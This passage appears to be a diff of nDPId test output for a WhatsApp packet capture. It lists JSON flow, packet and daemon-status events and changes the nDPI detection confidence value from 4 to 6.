{"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655033850395,"flow_last_seen":1655033851037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40204,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655032256845,"flow_last_seen":1655032257332,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42272,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655032857220,"flow_last_seen":1655032858052,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42436,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655041569928,"flow_last_seen":1655041570160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655041570160,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41610,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655033797377,"flow_last_seen":1655033797657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42646,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655031983762,"flow_last_seen":1655031984056,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40084,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655033482376,"flow_last_seen":1655033482899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40178,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655033850395,"flow_last_seen":1655033851037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40204,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655032256845,"flow_last_seen":1655032257332,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42272,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655032857220,"flow_last_seen":1655032858052,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42436,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":106,"packets-processed":105,"total-skipped-flows":0,"total-l4-payload-len":7516,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":13,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":13,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":83,"global_ts_msec":1655042688447} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655042688447,"flow_last_seen":1655042688447,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655042688447,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41808,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1655042688447,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655042688447,"pkt":"eJS0JASgYDjgxTWgCABFAAA8k4BAAD8GbsHAqAJkszzDMaNQFGac145xAAAAAKAC\/\/+5KwAAAgQFtAQCCAo3tzqhAAAAAAEDAwk="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1655042688525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655042688525,"pkt":"eJS0JASgYDjgxTWgCABFAAA0k4FAAD8GbsjAqAJkszzDMaNQFGac145yikooJoAQAIAprAAAAQEICje3OwWKYYCH"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1655042689647,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655042689647,"pkt":"eJS0JASgYDjgxTWgCABFAAA4k4JAAD8GbsPAqAJkszzDMaNQFGac145yikooJoAYAIDgCgAAAQEICje3P1WKYYCHRUQAAQ=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655042688447,"flow_last_seen":1655042689683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655042689683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41808,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":114,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655034332550,"flow_last_seen":1655034332854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655042690163,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45932,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655042688447,"flow_last_seen":1655042689683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655042689683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41808,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":114,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655034332550,"flow_last_seen":1655034332854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655042690163,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45932,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":114,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":114,"packets-processed":113,"total-skipped-flows":0,"total-l4-payload-len":7810,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":14,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":14,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":90,"global_ts_msec":1655043596112} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655043596112,"flow_last_seen":1655043596112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655043596112,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37482,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1655043596112,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655043596112,"pkt":"eJS0JASgYDjgxTWgCABFAAA8sPxAAD8GUVXAqAJkszzDIZJqFGboXByKAAAAAKAC\/\/9iMwAAAgQFtAQCCAoEt\/vxAAAAAAEDAwk="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1655043596145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655043596145,"pkt":"eJS0JASgYDjgxTWgCABFAAA0sP1AAD8GUVzAqAJkszzDIZJqFGboXByLxoplnYAQAKyC0AAAAQEICgS3\/BKyfC6v"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1655043596145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655043596145,"pkt":"eJS0JASgYDjgxTWgCABFAAA4sP5AAD8GUVfAqAJkszzDIZJqFGboXByLxoplnYAYAKw9fwAAAQEICgS3\/BKyfC6vRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655043596112,"flow_last_seen":1655043596146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655043596146,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37482,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655043596112,"flow_last_seen":1655043596146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655043596146,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37482,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":122,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":122,"packets-processed":121,"total-skipped-flows":0,"total-l4-payload-len":9083,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":15,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":15,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":96,"global_ts_msec":1655044288744} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655044288744,"flow_last_seen":1655044288744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655044288744,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37582,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1655044288744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655044288744,"pkt":"eJS0JASgYDjgxTWgCABFAAA8Rj1AAD8GvBTAqAJkszzDIZLOFGbS4v0+AAAAAKAC\/\/8FAwAAAgQFtAQCCAoEwo14AAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1655044288776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655044288776,"pkt":"eJS0JASgYDjgxTWgCABFAAA0Rj5AAD8GvBvAqAJkszzDIZLOFGbS4v0\/XwbxEoAQAKw+pwAAAQEICgTCjaZrpjiA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1655044288777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655044288777,"pkt":"eJS0JASgYDjgxTWgCABFAAA4Rj9AAD8GvBbAqAJkszzDIZLOFGbS4v0\/XwbxEoAYAKz5VAAAAQEICgTCjadrpjiARUQAAQ=="} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655044288744,"flow_last_seen":1655044288777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655044288777,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37582,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655044288744,"flow_last_seen":1655044288777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655044288777,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37582,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":130,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":130,"packets-processed":129,"total-skipped-flows":0,"total-l4-payload-len":10356,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":16,"total-detection-updates":0,"total-updates":0,"current-active-flows":8,"total-active-flows":16,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":102,"global_ts_msec":1655044965142} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655044965142,"flow_last_seen":1655044965142,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655044965142,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45754,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1655044965142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655044965142,"pkt":"eJS0JASgYDjgxTWgCABFAAA8At1AAD8G\/2TAqAJkszzDMbK6FGZec+QxAAAAAKAC\/\/+2PgAAAgQFtAQCCApG+geGAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1655044965172,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655044965172,"pkt":"eJS0JASgYDjgxTWgCABFAAA0At5AAD8G\/2vAqAJkszzDMbK6FGZec+QyZebbNIAQAVdZxAAAAQEICkb6B6qVR7NZ"} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1655044965191,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655044965191,"pkt":"eJS0JASgYDjgxTWgCABFAAA4At9AAD8G\/2bAqAJkszzDMbK6FGZec+QyZebbNIAYAVcUYAAAAQEICkb6B72VR7NZRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655044965142,"flow_last_seen":1655044965221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655044965221,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45754,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":138,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655036863658,"flow_last_seen":1655036864020,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655044965409,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40954,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655044965142,"flow_last_seen":1655044965221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655044965221,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45754,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":138,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655036863658,"flow_last_seen":1655036864020,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655044965409,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40954,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":138,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":138,"packets-processed":137,"total-skipped-flows":0,"total-l4-payload-len":10673,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":17,"total-detection-updates":0,"total-updates":0,"current-active-flows":8,"total-active-flows":17,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":109,"global_ts_msec":1655045751925} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655045751925,"flow_last_seen":1655045751925,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655045751925,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45824,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1655045751925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655045751925,"pkt":"eJS0JASgYDjgxTWgCABFAAA8tn9AAD8GS8LAqAJkszzDMbMAFGajVEhsAAAAAKAC\/\/+wTwAAAgQFtAQCCApG\/mQPAAAAAAEDAwg="} 